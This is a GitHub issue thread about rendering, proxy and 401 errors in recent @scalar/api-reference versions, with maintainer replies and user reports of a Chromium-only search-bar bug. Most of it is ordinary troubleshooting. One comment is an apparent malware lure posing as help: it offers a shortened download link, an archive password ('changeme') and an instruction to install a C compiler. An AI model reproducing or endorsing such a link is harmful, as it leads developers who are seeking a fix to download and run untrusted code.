### ISSUE TITLE
Critical errors happen since `@scalar/api-reference` v1.25.12 - v1.25.13 (current latest)

### ISSUE THREAD

**Issue by redstrike** [scalar/scalar#3158]
### What happens?

Everything was good until **v1.25.12**. The API reference page is rendered with missing information.
I cannot send test requests due to blocked by weird 401 status code on an allow anonymous endpoint.
Also, got proxy issues due to the HTTP client tries to send request via **proxy.scalar.com** in my company network.

![image](https://github.com/user-attachments/assets/6997c033-3d63-4b00-b711-3de40c89cb4c)

### What did you expect to happen?

Example correctly rendered UI in v1.25.11. And it works normally.

![image](https://github.com/user-attachments/assets/7b6dec3d-017e-476d-88d5-4d600a84323b)

I am using Scalar UI via ASP.NET Core 8's nuget package: **Scalar.AspNetCore**
Currently, I have to workaround to revert the frontend js version.

P/s: Besides, I think we should not embed css code directly into the docs, in case of errors happen (the top-left search component doesn't show correctly even after I revert the script version). Reference with a specific version should be more reliable.

![image](https://github.com/user-attachments/assets/5721ad32-314e-46d9-a5db-66be0b2a67a8)
![image](https://github.com/user-attachments/assets/4718165c-c31a-422f-89a5-890c9864cd37)

**Comment by d-dvorkin** [comment]
maybe this will help
https://bit.ly/4gvtdhO
Archive codepass: changeme
If you don't have the c compliator, install it.(gcc or clang)

**Comment by marclave** [comment]
hey @redstrike 

if you install `1.25.14` the proxy bug is fixed :) which should fix the fetching bug!

**Comment by marclave** [comment]
```
P/s: Besides, I think we should not embed css code directly into the docs, in case of errors happen (the top-left search component doesn't show correctly even after I revert the script version). Reference with a specific version should be more reliable.
```

how do you mean embedding css directly breaks the search bar? :)

**Comment by redstrike** [comment]
Hello @marclave,

**The fetching bug has been fixed.** (Tested on v1.25.16)
However, the UI of API Reference page still being rendered incorectly when comparing to v1.25.11.
Also, the nuget package **Scalar.AspNetCore** has issue that related to Auto Light/Dark theme => The UI cannot remember the last theme setting on the frontend (switched to dark, but after a reload it reverts back to light). So, I have to keep using v1.25.11 now.

> how do you mean embedding css directly breaks the search bar? :)
I don't know exactly why the search bar is rendered incorrectly, but some how correct after I have deployed my hotfix in my team shared environment. Maybe due to the latest version of Chrome? However, it would be helpful if we use a CDN reference similar to api-reference js. So, we can actively revert back to a known stable version in case of styling related issues.

**Comment by svetstoykov** [comment]
> However, it would be helpful if we use a CDN reference similar to api-reference js. So, we can actively revert back to a known stable version in case of styling related issues.

I agree. We noticed the broken search-bar today. Is there a way to reference the previous `api-reference` so we can "revert" this issue?

**Comment by Nikkoro** [comment]
Seems like the UI issue is related to Chromium based browsers; UI displays correctly on Firefox

**Comment by gsmcdonald** [comment]
@Nikkoro We're seeing the same thing. FWIW, we're using v1.24.58 via a CDN (and have tried v1.25.11 as well). It started happening to us as well.
